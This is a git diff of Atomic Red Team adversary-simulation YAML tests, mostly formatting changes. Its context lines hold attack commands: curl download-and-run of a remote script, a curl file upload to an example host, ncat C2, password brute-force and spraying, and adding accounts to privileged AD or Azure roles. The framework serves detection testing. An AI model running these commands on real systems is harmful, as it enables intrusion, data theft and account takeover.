+ Tor must be installed on the machine prereq_command: | - if [ -x "$(command -v tor --version)" ]; then exit 0; else exit 1; fi + if [ -x "$(command -v tor --version)" ]; then exit 0; else exit 1; fi get_prereq_command: | if [ ! -x "$(command -v brew --version)" ]; then /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh keystroke return)"; fi brew install tor executor: command: | - osascript -e 'tell application "Terminal" to do script "tor"' + osascript -e 'tell application "Terminal" to do script "tor"' cleanup_command: | - killall tor > /dev/null 2>&1 - name: sh + killall tor > /dev/null 2>&1 + name: sh diff --git a/atomics/T1095/T1095.yaml b/atomics/T1095/T1095.yaml index 737cc17c..a6175bb0 100644 --- a/atomics/T1095/T1095.yaml +++ b/atomics/T1095/T1095.yaml @@ -11,7 +11,7 @@ atomic_tests: input_arguments: server_ip: description: The IP address of the listening server - type: String + type: string default: 127.0.0.1 executor: command: | @@ -19,7 +19,7 @@ atomic_tests: Invoke-PowerShellIcmp -IPAddress #{server_ip} name: powershell - name: Netcat C2 - auto_generated_guid: bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37 + auto_generated_guid: bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37 description: | Start C2 Session Using Ncat To start the listener on a Linux device, type the following: @@ -29,19 +29,19 @@ atomic_tests: input_arguments: server_port: description: The port for the C2 connection - type: Integer + type: integer default: 80 ncat_exe: description: The location of ncat.exe - type: Path + type: path default: $env:TEMP\T1095\nmap-7.80\ncat.exe ncat_path: description: The folder path of ncat.exe - type: Path + type: path default: $env:TEMP\T1095 server_ip: description: The IP address or domain name of the listening server - type: String + type: string default: 127.0.0.1 dependency_executor_name: powershell dependencies: @@ -74,11 +74,11 @@ atomic_tests: input_arguments: server_ip: description: The IP address or domain name of the listening server - type: String + type: string default: 127.0.0.1 server_port: description: The port for the C2 connection - type: Integer + type: integer default: 80 executor: command: | diff --git a/atomics/T1098.001/T1098.001.yaml b/atomics/T1098.001/T1098.001.yaml index 53daa131..b203d66d 100644 --- a/atomics/T1098.001/T1098.001.yaml +++ b/atomics/T1098.001/T1098.001.yaml @@ -12,23 +12,23 @@ atomic_tests: input_arguments: username: description: Azure AD username - type: String + type: string default: jonh@contoso.com password: description: Azure AD password - type: String + type: string default: p4sswd service_principal_name: description: Name of the targeted service principal - type: String + type: string default: SuperSP certificate_password: description: Password of the new certificate - type: String + type: string default: Passw0rd path_to_cert: - description: Path of the new certificate, locally stored - type: String + description: Path of the new certificate, locally stored + type: string default: $env:TEMP dependency_executor_name: powershell dependencies: @@ -83,7 +83,7 @@ atomic_tests: } Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item rm "#{path_to_cert}\#{service_principal_name}.pfx" -ErrorAction Ignore - + name: powershell elevation_required: false - name: Azure AD Application Hijacking - App Registration @@ -97,23 +97,23 @@ atomic_tests: input_arguments: username: description: Azure AD username - type: String + type: string default: jonh@contoso.com password: description: Azure AD password - type: String + type: string default: p4sswd application_name: - description: Name of the targeted application - type: String + description: Name of the targeted application + type: string default: SuperApp certificate_password: description: Password of the new certificate - type: String + type: string default: Passw0rd path_to_cert: - description: Path of the new certificate, locally stored - type: String + description: Path of the new certificate, locally stored + type: string default: $env:TEMP dependency_executor_name: powershell dependencies: @@ -178,15 +178,15 @@ atomic_tests: input_arguments: username: description: Create new AWS access and secret keys for the user - type: String + type: string default: "atomicredteam" dependencies: - - description: | - Check if the user exists. - prereq_command: | - aws iam list-users | grep #{username} - get_prereq_command: | - echo Please run atomic test T1136.003, before running this atomic + - description: | + Check if the user exists. + prereq_command: | + aws iam list-users | grep #{username} + get_prereq_command: | + echo Please run atomic test T1136.003, before running this atomic executor: command: | aws iam create-access-key --user-name #{username} > $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds diff --git a/atomics/T1098/T1098.yaml b/atomics/T1098/T1098.yaml index 768d8118..cfcac453 100644 --- a/atomics/T1098/T1098.yaml +++ b/atomics/T1098/T1098.yaml @@ -41,7 +41,7 @@ atomic_tests: auto_generated_guid: a55a22e9-a3d3-42ce-bd48-2653adb8f7a9 description: | Create a random atr-nnnnnnnn account and add it to a domain group (by default, Domain Admins). - + The quickest way to run it is against a domain controller, using `-Session` of `Invoke-AtomicTest`. Alternatively, you need to install PS Module ActiveDirectory (in prereqs) and run the script with appropriare AD privileges to create the user and alter the group. Automatic installation of the dependency requires an elevated session, @@ -59,15 +59,15 @@ atomic_tests: description: | Prefix string of the random username (by default, atr-). Because the cleanup deletes such account based on a match `(&(samaccountname=#{account_prefix}-*)(givenName=Test))`, if you are to change it, be careful. - type: String + type: string default: atr- group: description: Name of the group to alter - type: String + type: string default: "Domain Admins" create_args: - description: Additional string appended to New-ADUser call - type: String + description: Additional string appended to New-ADUser call + type: string default: "" dependencies: - description: | @@ -110,15 +110,15 @@ atomic_tests: input_arguments: username: description: Name of the AWS group to create - type: String + type: string default: "atomicredteam" dependencies: - - description: | - Check if the user exists, we can only add a user to a group if the user exists. - prereq_command: | - aws iam list-users | grep #{username} - get_prereq_command: | - echo Please run atomic test T1136.003, before running this atomic test + - description: | + Check if the user exists, we can only add a user to a group if the user exists. + prereq_command: | + aws iam list-users | grep #{username} + get_prereq_command: | + echo Please run atomic test T1136.003, before running this atomic test executor: command: | aws iam create-group --group-name #{username} @@ -135,7 +135,7 @@ atomic_tests: may be interested primarily in highly privileged roles, e.g. Global Administrator, Application Administrator, Privileged authentication administrator (this role can reset Global Administrator password!). By default, the role Global Reader is assigned to service principal in this test. - + The account you use to run the PowerShell command should have Privileged Role Administrator or Global Administrator role in your Azure AD. Detection hint - check Activity "Add member to role" in Azure AD Audit Logs. In targer you will also see User as a type. @@ -144,20 +144,20 @@ atomic_tests: input_arguments: username: description: Azure AD username - type: String + type: string default: jonh@contoso.com password: description: Azure AD password - type: String + type: string default: p4sswd user_principal_name: description: Name of the targeted user (user principal) - type: String + type: string default: SuperUser role_name: description: Name of the targed Azure AD role - type: String - default: Global Reader + type: string + default: Global Reader dependencies: - description: | AzureAD module must be installed. @@ -188,7 +188,7 @@ atomic_tests: if ($user -eq $null) { Write-Warning "User not found"; exit } $role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq "#{role_name}"} if ($role -eq $null) { Write-Warning "Role not found"; exit } - + Remove-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -MemberId $user.ObjectId Write-Host "User $($user.DisplayName) was removed from $($role.DisplayName) role" name: powershell @@ -201,7 +201,7 @@ atomic_tests: may be interested primarily in highly privileged roles, e.g. Global Administrator, Application Administrator, Privileged authentication administrator (this role can reset Global Administrator password!). By default, the role Global Reader is assigned to service principal in this test. - + The account you use to run the PowerShell command should have Privileged Role Administrator or Global Administrator role in your Azure AD. Detection hint - check Activity "Add member to role" in Azure AD Audit Logs. In targer you will also see Service Principal as a type. @@ -210,20 +210,20 @@ atomic_tests: input_arguments: username: description: Azure AD username - type: String + type: string default: jonh@contoso.com password: description: Azure AD password - type: String + type: string default: p4sswd service_principal_name: description: Name of the service principal - type: String + type: string default: SuperSP role_name: description: Name of the targed Azure AD role - type: String - default: Global Reader + type: string + default: Global Reader dependencies: - description: | AzureAD module must be installed. @@ -268,7 +268,7 @@ atomic_tests: By default, the role Reader is assigned to user in this test. New-AzRoleAssignment cmdlet could be also use to assign user/service principal to resource, resource group and management group. - + The account you use to run the PowerShell command must have Microsoft.Authorization/roleAssignments/write (e.g. such as User Access Administrator or Owner) and the Azure Active Directory Graph Directory.Read.All and Microsoft Graph Directory.Read.All permissions. @@ -279,23 +279,23 @@ atomic_tests: input_arguments: username: description: Azure AD username - type: String + type: string default: jonh@contoso.com password: description: Azure AD password - type: String + type: string default: p4sswd user_principal_name: description: Name of the targeted user (user principal) - type: String + type: string default: SuperUser role_name: description: Name of the targed Azure role - type: String + type: string default: Reader subscription: description: Name of the targed subscription - type: String + type: string default: Azure subscription 1 dependencies: - description: | @@ -346,7 +346,7 @@ atomic_tests: By default, the role Reader is assigned to service principal in this test. New-AzRoleAssignment cmdlet could be also use to assign user/service principal to resource, resource group and management group. - + The account you use to run the PowerShell command must have Microsoft.Authorization/roleAssignments/write (e.g. such as User Access Administrator or Owner) and the Azure Active Directory Graph Directory.Read.All and Microsoft Graph Directory.Read.All permissions. @@ -357,24 +357,24 @@ atomic_tests: input_arguments: username: description: Azure AD username - type: String + type: string default: jonh@contoso.com password: description: Azure AD password - type: String + type: string default: p4sswd service_principal_name: description: Name of the service principal - type: String + type: string default: SuperSP role_name: description: Name of the targed Azure role - type: String - default: Reader + type: string + default: Reader subscription: description: Name of the targed subscription - type: String - default: Azure subscription 1 + type: string + default: Azure subscription 1 dependencies: - description: | Az.Resources module must be installed. @@ -410,7 +410,7 @@ atomic_tests: if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit } $role = Get-AzRoleDefinition | where-object {$_.Name -eq "#{role_name}"} if ($role -eq $null) { Write-Warning "Role not found"; exit } - + Remove-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription Write-Host "Service Principal $($sp.DisplayName) was removed from $($role.Name) role in subscriptions $($subscriptions.Name)" name: powershell @@ -436,19 +436,19 @@ atomic_tests: input_arguments: username: description: Azure AD username - type: String + type: string default: jonh@contoso.com password: description: Azure AD password - type: String + type: string default: p4sswd application_name: description: Name of the targed application - type: String + type: string default: test_app application_permission: description: Permission from Microsoft Graph Resource API that will be add to application - type: String + type: string default: DirectoryRecommendations.Read.All dependencies: - description: | @@ -512,7 +512,7 @@ atomic_tests: $aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq "#{application_name}"} Remove-AzureADApplication -ObjectId $aadApplication.ObjectId - + name: powershell elevation_required: false - name: Password Change on Directory Service Restore Mode (DSRM) Account @@ -521,11 +521,11 @@ atomic_tests: description: | Change the password on the Directory Service Restore Mode (DSRM) account using ntdsutil by syncing to existing account supported_platforms: - - windows + - windows input_arguments: sync_account: description: Account to sync password from - type: String + type: string default: '%username%' executor: name: command_prompt diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml index dbb494e7..b216f426 100644 --- a/atomics/T1105/T1105.yaml +++ b/atomics/T1105/T1105.yaml @@ -11,19 +11,19 @@ atomic_tests: input_arguments: remote_path: description: Remote path to receive rsync - type: Path + type: path default: /tmp/victim-files remote_host: description: Remote host to copy toward - type: String + type: string default: victim-host local_path: description: Path of folder to copy - type: Path + type: path default: /tmp/adversary-rsync/ username: description: User account to authenticate on remote host - type: String + type: string default: victim executor: command: | @@ -39,19 +39,19 @@ atomic_tests: input_arguments: remote_path: description: Path of folder to copy - type: Path + type: path default: /tmp/adversary-rsync/ remote_host: description: Remote host to copy from - type: String + type: string default: adversary-host local_path: description: Local path to receive rsync - type: Path + type: path default: /tmp/victim-files username: description: User account to authenticate on remote host - type: String + type: string default: adversary executor: command: | @@ -67,19 +67,19 @@ atomic_tests: input_arguments: remote_path: description: Remote path to receive scp - type: Path + type: path default: /tmp/victim-files/ local_file: description: Path of file to copy - type: Path + type: path default: /tmp/adversary-scp remote_host: description: Remote host to copy toward - type: String + type: string default: victim-host username: description: User account to authenticate on remote host - type: String + type: string default: victim executor: command: | @@ -95,19 +95,19 @@ atomic_tests: input_arguments: remote_host: description: Remote host to copy from - type: String + type: string default: adversary-host local_path: description: Local path to receive scp - type: Path + type: path default: /tmp/victim-files/ remote_file: description: Path of file to copy - type: Path + type: path default: /tmp/adversary-scp username: description: User account to authenticate on remote host - type: String + type: string default: adversary executor: command: | @@ -123,19 +123,19 @@ atomic_tests: input_arguments: remote_path: description: Remote path to receive sftp - type: Path + type: path default: /tmp/victim-files/ local_file: description: Path of file to copy - type: Path + type: path default: /tmp/adversary-sftp remote_host: description: Remote host to copy toward - type: String + type: string default: victim-host username: description: User account to authenticate on remote host - type: String + type: string default: victim executor: command: | @@ -151,19 +151,19 @@ atomic_tests: input_arguments: remote_host: description: Remote host to copy from - type: String + type: string default: adversary-host local_path: description: Local path to receive sftp - type: Path + type: path default: /tmp/victim-files/ remote_file: description: Path of file to copy - type: Path + type: path default: /tmp/adversary-sftp username: description: User account to authenticate on remote host - type: String + type: string default: adversary executor: command: | @@ -178,11 +178,11 @@ atomic_tests: input_arguments: remote_file: description: URL of file to copy - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt local_path: description: Local path to place file - type: Path + type: path default: Atomic-license.txt executor: command: | @@ -199,11 +199,11 @@ atomic_tests: input_arguments: remote_file: description: URL of file to copy - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt local_path: description: Local path to place file - type: Path + type: path default: Atomic-license.txt executor: command: | @@ -225,15 +225,15 @@ atomic_tests: input_arguments: bits_job_name: description: Name of the created BITS job - type: String + type: string default: qcxjb7 local_path: description: Local path to place file - type: Path + type: path default: '%temp%\Atomic-license.txt' remote_file: description: URL of file to copy - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt executor: command: | @@ -249,11 +249,11 @@ atomic_tests: input_arguments: remote_file: description: URL of file to copy - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt destination_path: description: Destination path to file - type: Path + type: path default: $env:TEMP\Atomic-license.txt executor: command: | @@ -270,7 +270,7 @@ atomic_tests: input_arguments: destination_path: description: Path to create remote file at. Default is local admin share. - type: String + type: string default: '\\localhost\C$' executor: command: | @@ -311,11 +311,11 @@ atomic_tests: input_arguments: remote_file: description: URL of file to download - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt local_path: description: Location to save downloaded file - type: Path + type: path default: '%temp%\Atomic-license.txt' dependencies: - description: 'Must have a Windows Defender version with MpCmdRun.exe installed' @@ -341,31 +341,31 @@ atomic_tests: input_arguments: remote_host: description: Remote hostname or IP address - type: String + type: string default: localhost remote_port: description: Remote port to connect to - type: Integer + type: integer default: 8443 output_file: description: Path of file to save output to - type: Path + type: path default: /tmp/T1105.whois.out query: description: Query to send to remote server - type: String + type: string default: "Hello from Atomic Red Team test T1105" timeout: description: Timeout period before ending process (seconds) - type: Integer + type: integer default: 1 dependencies: - - description: | - The whois and timeout commands must be present - prereq_command: | - which whois && which timeout - get_prereq_command: | - echo "Please install timeout and the whois package" + - description: | + The whois and timeout commands must be present + prereq_command: | + which whois && which timeout + get_prereq_command: | + echo "Please install timeout and the whois package" executor: name: sh elevation_required: false @@ -382,11 +382,11 @@ atomic_tests: input_arguments: target_remote_file: description: File to download - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt output_file: description: File to write to - type: String + type: string default: LICENSE.txt executor: command: | @@ -404,7 +404,7 @@ atomic_tests: input_arguments: remote_host: description: Remote hostname or IP address - type: String + type: string default: localhost executor: name: command_prompt @@ -447,24 +447,24 @@ atomic_tests: input_arguments: file_download: description: File to download - type: String + type: string default: https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll curl_path: description: path to curl.exe - type: Path + type: path default: C:\Windows\System32\Curl.exe - dependency_executor_name: powershell - dependencies: - - description: | - Curl must be installed on system. - prereq_command: | - if (Test-Path #{curl_path}) {exit 0} else {exit 1} - get_prereq_command: | - Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile $env:temp\curl.zip - Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl - Copy-Item $env:temp\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System32\Curl.exe - Remove-Item $env:temp\curl - Remove-Item $env:temp\curl.zip + dependency_executor_name: powershell + dependencies: + - description: | + Curl must be installed on system. + prereq_command: | + if (Test-Path #{curl_path}) {exit 0} else {exit 1} + get_prereq_command: | + Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile $env:temp\curl.zip + Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl + Copy-Item $env:temp\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System32\Curl.exe + Remove-Item $env:temp\curl + Remove-Item $env:temp\curl.zip executor: command: | #{curl_path} -k #{file_download} -o c:\users\public\music\allthethingsx64.dll @@ -488,34 +488,34 @@ atomic_tests: input_arguments: curl_path: description: path to curl.exe - type: Path + type: path default: C:\Windows\System32\Curl.exe remote_destination: description: Remote destination - type: String + type: string default: www.example.com file_path: description: File to upload - type: String + type: string default: c:\temp\atomictestfile.txt - dependency_executor_name: powershell - dependencies: - - description: | - Curl must be installed on system. - prereq_command: | - if (Test-Path #{curl_path}) {exit 0} else {exit 1} - get_prereq_command: | - Invoke-WebRequest “https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip” -Outfile $env:temp\curl.zip - Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl - Copy-Item $env:temp\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System32\Curl.exe - Remove-Item $env:temp\curl - Remove-Item $env:temp\curl.zip - - description: | - A file must be created to upload - prereq_command: | - if (Test-Path #{file_path}) {exit 0} else {exit 1} - get_prereq_command: | - echo "This is an Atomic Test File" > #{file_path} + dependency_executor_name: powershell + dependencies: + - description: | + Curl must be installed on system. + prereq_command: | + if (Test-Path #{curl_path}) {exit 0} else {exit 1} + get_prereq_command: | + Invoke-WebRequest “https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip” -Outfile $env:temp\curl.zip + Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl + Copy-Item $env:temp\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System32\Curl.exe + Remove-Item $env:temp\curl + Remove-Item $env:temp\curl.zip + - description: | + A file must be created to upload + prereq_command: | + if (Test-Path #{file_path}) {exit 0} else {exit 1} + get_prereq_command: | + echo "This is an Atomic Test File" > #{file_path} executor: command: | #{curl_path} -T #{file_path} #{remote_destination} @@ -524,7 +524,7 @@ atomic_tests: #{curl_path} --data #{file_path} #{remote_destination} name: command_prompt -- name: Download a file with Microsoft Connection Manager Auto-Download +- name: Download a file with Microsoft Connection Manager Auto-Download auto_generated_guid: d239772b-88e2-4a2e-8473-897503401bcc description: | Uses the cmdl32 to download arbitrary file from the internet. The cmdl32 package is allowed to install the profile used to launch the VPN connection. However, the config is modified to download the arbitary file. @@ -536,14 +536,14 @@ atomic_tests: https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/ https://strontic.github.io/xcyclopedia/library/cmdl32.exe-FA1D5B8802FFF4A85B6F52A52C871BBB.html supported_platforms: - - windows + - windows input_arguments: Path_to_file: description: Path to the Batch script - type: Path + type: path default: PathToAtomicsFolder\T1105\src\T1105.bat - dependency_executor_name: powershell - dependencies: + dependency_executor_name: powershell + dependencies: - description: | #{Path_to_file} must exist on system. prereq_command: | @@ -574,11 +574,11 @@ atomic_tests: default: $env:comspec exe_remote_folder: description: Path to store executable on remote machine (no drive letter) - type: String + type: string default: \Windows\Temp\T1105.exe remote_drive_letter: description: Remote drive letter - type: String + type: string default: C dependency_executor_name: powershell dependencies: @@ -621,15 +621,15 @@ atomic_tests: description: | Create a ZIP file from a folder in a remote drive supported_platforms: - - windows + - windows input_arguments: Path_unc: description: Path to the UNC folder - type: Path + type: path default: \\127.0.0.1\c$\AtomicRedTeam\atomics\T1105\src\ Path_PrintBrm: description: Path to PrintBrm.exe - type: Path + type: path default: C:\Windows\System32\spool\tools\PrintBrm.exe executor: command: | @@ -645,18 +645,18 @@ atomic_tests: Copy file.cab to destination Reference: https://lolbas-project.github.io/lolbas/Binaries/Replace/ supported_platforms: - - windows + - windows input_arguments: replace_cab: description: Path to the cab file - type: Path - default: PathToAtomicsFolder\T1105\src\redcanary.cab + type: path + default: PathToAtomicsFolder\T1105\src\redcanary.cab Path_replace: description: Path to replace.exe - type: Path + type: path default: C:\Windows\System32\replace.exe - dependency_executor_name: powershell - dependencies: + dependency_executor_name: powershell + dependencies: - description: | #{replace_cab} must exist on system. prereq_command: | @@ -678,15 +678,15 @@ atomic_tests: Copy UNC file to destination Reference: https://lolbas-project.github.io/lolbas/Binaries/Replace/ supported_platforms: - - windows + - windows input_arguments: replace_cab: description: UNC Path to the cab file - type: Path - default: \\127.0.0.1\c$\AtomicRedTeam\atomics\T1105\src\redcanary.cab + type: path + default: \\127.0.0.1\c$\AtomicRedTeam\atomics\T1105\src\redcanary.cab Path_replace: description: Path to replace.exe - type: Path + type: path default: C:\Windows\System32\replace.exe executor: command: | @@ -704,7 +704,7 @@ atomic_tests: input_arguments: local_path: description: Local path to place file - type: String + type: string default: '%temp%\Atomic-license.txt' remote_file: description: URL of file to copy @@ -723,10 +723,10 @@ atomic_tests: input_arguments: vbscript_file: description: Full path to the VisualBasic downloading the file - type: String + type: string default: PathToAtomicsFolder\T1105\src\T1105-download-file.vbs - dependency_executor_name: powershell - dependencies: + dependency_executor_name: powershell + dependencies: - description: | #{vbscript_file} must be exist on system. prereq_command: | @@ -743,16 +743,16 @@ atomic_tests: description: | Utilize linux Curl to download a remote file, chmod +x it and run it. supported_platforms: - - linux + - linux input_arguments: remote_url: description: url of remote payload type: string - default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/src/atomic.sh + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/src/atomic.sh payload_name: description: payload name type: string - default: atomic.sh + default: atomic.sh executor: command: | curl -sO #{remote_url}; chmod +x #{payload_name} | bash #{payload_name} @@ -768,15 +768,15 @@ atomic_tests: input_arguments: remote_file: description: URL of file to copy - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt destination_path: description: Destination path to file - type: Path + type: path default: $env:TEMP\Atomic-license.txt local_nimgrab: description: Local path to nimgrab - type: Path + type: path default: $env:TEMP\nimgrab.exe executor: command: | @@ -784,32 +784,32 @@ atomic_tests: cleanup_command: | del #{destination_path} >nul 2>&1 name: command_prompt - dependency_executor_name: powershell - dependencies: - - description: | - NimGrab must be installed on system. - prereq_command: | - if (Test-Path "#{local_nimgrab}") {exit 0} else {exit 1} - get_prereq_command: | - Invoke-WebRequest "https://nim-lang.org/download/nim-1.6.6_x64.zip" -Outfile $env:temp\nim.zip - Expand-Archive -Path $env:temp\nim.zip -DestinationPath $env:temp\nim -Force - Copy-Item $env:temp\nim\nim-1.6.6\bin\nimgrab.exe #{local_nimgrab} - Remove-Item $env:temp\nim - Remove-Item $env:temp\nim.zip -- name: iwr or Invoke Web-Request download + dependency_executor_name: powershell + dependencies: + - description: | + NimGrab must be installed on system. + prereq_command: | + if (Test-Path "#{local_nimgrab}") {exit 0} else {exit 1} + get_prereq_command: | + Invoke-WebRequest "https://nim-lang.org/download/nim-1.6.6_x64.zip" -Outfile $env:temp\nim.zip + Expand-Archive -Path $env:temp\nim.zip -DestinationPath $env:temp\nim -Force + Copy-Item $env:temp\nim\nim-1.6.6\bin\nimgrab.exe #{local_nimgrab} + Remove-Item $env:temp\nim + Remove-Item $env:temp\nim.zip +- name: iwr or Invoke Web-Request download auto_generated_guid: c01cad7f-7a4c-49df-985e-b190dcf6a279 - description: | + description: | Use 'iwr' or "Invoke-WebRequest" -URI argument to download a file from the web. Note: without -URI also works in some versions. supported_platforms: - windows input_arguments: remote_file: description: URL of file to copy - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt local_path: description: Local path to place file - type: Path + type: path default: '%temp%\Atomic-license.txt' executor: command: | diff --git a/atomics/T1106/T1106.yaml b/atomics/T1106/T1106.yaml index 5801df95..36b7fb1b 100644 --- a/atomics/T1106/T1106.yaml +++ b/atomics/T1106/T1106.yaml @@ -9,14 +9,14 @@ atomic_tests: input_arguments: source_file: description: Location of the CSharp source file to compile and execute - type: Path + type: path default: PathToAtomicsFolder\T1106\src\CreateProcess.cs output_file: description: Location of the payload - type: Path + type: path default: '%tmp%\T1106.exe' - dependency_executor_name: powershell - dependencies: + dependency_executor_name: powershell + dependencies: - description: | #{source_file} must exist on system. prereq_command: | diff --git a/atomics/T1110.001/T1110.001.yaml b/atomics/T1110.001/T1110.001.yaml index 9510f0d3..d9934aa3 100644 --- a/atomics/T1110.001/T1110.001.yaml +++ b/atomics/T1110.001/T1110.001.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: user: description: Account to bruteforce - type: String + type: string default: '%username%' executor: name: command_prompt @@ -31,19 +31,19 @@ atomic_tests: input_arguments: user: description: Account to bruteforce - type: String + type: string default: $ENV:USERNAME passwords_path: description: List of passwords we will attempt to brute force with - type: Path + type: path default: PathToAtomicsFolder\T1110.001\src\passwords.txt domain: description: Active Directory domain FQDN - type: String + type: string default: $env:UserDnsDomain auth: description: authentication method to choose between "NTLM" and "Kerberos" - type: String + type: string default: NTLM executor: name: powershell @@ -81,11 +81,11 @@ atomic_tests: input_arguments: username: description: Account to bruteforce. We encourage users running this atomic to add a valid microsoft account domain; for eg "bruce.wayne@" - type: String + type: string default: bruce.wayne@contoso.com passwords: description: List of passwords we will attempt to brute force with - type: String + type: string default: Password1`n1q2w3e4r`nPassword! dependency_executor_name: powershell dependencies: @@ -125,7 +125,7 @@ atomic_tests: If the password list contains the user password in last 9 entries, a sudo will be attempted and will succeed if user is in /etc/sudoers. The /var/log/auth.log will show evidence of "3 incorrect password attempts" or "user NOT in sudoers" supported_platforms: - - linux + - linux dependency_executor_name: sh dependencies: - description: | @@ -152,7 +152,7 @@ atomic_tests: description: | Brute force the password of a local user account which is a member of the sudo'ers group on a Redhat based Linux distribution. supported_platforms: - - linux + - linux dependency_executor_name: sh dependencies: - description: | @@ -165,7 +165,7 @@ atomic_tests: get_prereq_command: | yum -y update && yum install -y openssl sudo executor: - elevation_required: true + elevation_required: true command: | useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password) target su target @@ -189,18 +189,18 @@ atomic_tests: name: sh - name: Password Brute User using Kerbrute Tool auto_generated_guid: 59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4 - description: | + description: | Bruteforce a single user's password from a wordlist supported_platforms: - windows input_arguments: domaincontroller: description: Domain controller where test will be run - type: String + type: string default: $ENV:userdnsdomain domain: description: Domain where you will be testing - type: String + type: string default: $ENV:userdomain dependency_executor_name: powershell dependencies: diff --git a/atomics/T1110.002/T1110.002.yaml b/atomics/T1110.002/T1110.002.yaml index dc4eeaba..68a39ce0 100644 --- a/atomics/T1110.002/T1110.002.yaml +++ b/atomics/T1110.002/T1110.002.yaml @@ -9,15 +9,15 @@ atomic_tests: input_arguments: hashcat_exe: description: Path to Hashcat executable - type: String + type: string default: '%temp%\hashcat6\hashcat-6.1.1\hashcat.exe' input_file_sam: description: Path to SAM file - type: String + type: string default: PathToAtomicsFolder\T1110.002\src\sam.txt input_file_passwords: description: Path to password list - type: String + type: string default: PathToAtomicsFolder\T1110.002\src\password.lst dependency_executor_name: powershell dependencies: diff --git a/atomics/T1110.003/T1110.003.yaml b/atomics/T1110.003/T1110.003.yaml index 96571458..6ba5912b 100644 --- a/atomics/T1110.003/T1110.003.yaml +++ b/atomics/T1110.003/T1110.003.yaml @@ -18,7 +18,7 @@ atomic_tests: input_arguments: password: description: The password to try for each user in users.txt - type: String + type: string default: Spring2020 dependencies: - description: | @@ -39,11 +39,11 @@ atomic_tests: https://github.com/dafthack/DomainPasswordSpray supported_platforms: - - windows + - windows input_arguments: domain: description: Domain to brute force against - type: String + type: string default: $Env:USERDOMAIN executor: name: powershell @@ -62,15 +62,15 @@ atomic_tests: input_arguments: password: description: single password we will attempt to auth with (if you need several passwords, then it is a bruteforce so see T1110.001) - type: String + type: string default: P@ssw0rd! domain: description: Domain FQDN - type: String + type: string default: $env:UserDnsDomain auth: description: authentication method to choose between "NTLM" and "Kerberos" - type: String + type: string default: NTLM executor: name: powershell @@ -102,7 +102,7 @@ atomic_tests: } } Write-Host "End of password spraying" -- name: Password spray all Azure AD users with a single password +- name: Password spray all Azure AD users with a single password auto_generated_guid: a8aa2d3e-1c52-4016-bc73-0f8854cfa80a description: | Attempt to brute force all Azure AD users with a single password (called "password spraying") via AzureAD Powershell module. @@ -112,15 +112,15 @@ atomic_tests: input_arguments: password: description: Single password we will attempt to auth with (if you need several passwords, then it is a bruteforce so see T1110.001) - type: String + type: string default: P@ssw0rd! valid_username: description: Valid username to retrieve Azure AD users. We encourage users running this atomic to add a valid microsoft account domain; for eg @ - type: String + type: string default: bruce.wayne@contoso.com valid_password: description: Valid password to authenticate as valid_username in the - type: String + type: string default: iamthebatman dependency_executor_name: powershell dependencies: @@ -176,15 +176,15 @@ atomic_tests: This atomic test will attempt a single password against all users in a password list at $env:Temp\usersdpsLight.txt. You can create this file manually or with the automated prereq_command. The prereq_command will limit the user list to 200 users by default to help you avoid massive account lockout. supported_platforms: - - windows + - windows input_arguments: user_limit: description: The max number of users to put in the list when running the prereq_command - type: Integer + type: integer default: 200 password: description: The password to try for each user in users.txt - type: String + type: string default: Spring2020 dependencies: - description: | @@ -233,11 +233,11 @@ atomic_tests: input_arguments: password: description: Single password to try against the list of user accounts - type: String + type: string default: P@ssword1 user_list: description: File path to list of users (one per line, formatted as user@subdomain.onmicrosoft.com) - type: String + type: string default: $env:temp\T1110.003UserList.txt dependency_executor_name: powershell dependencies: @@ -255,18 +255,18 @@ atomic_tests: Invoke-MSOLSpray -UserList "#{user_list}" -Password "#{password}" - name: Password Spray using Kerbrute Tool auto_generated_guid: 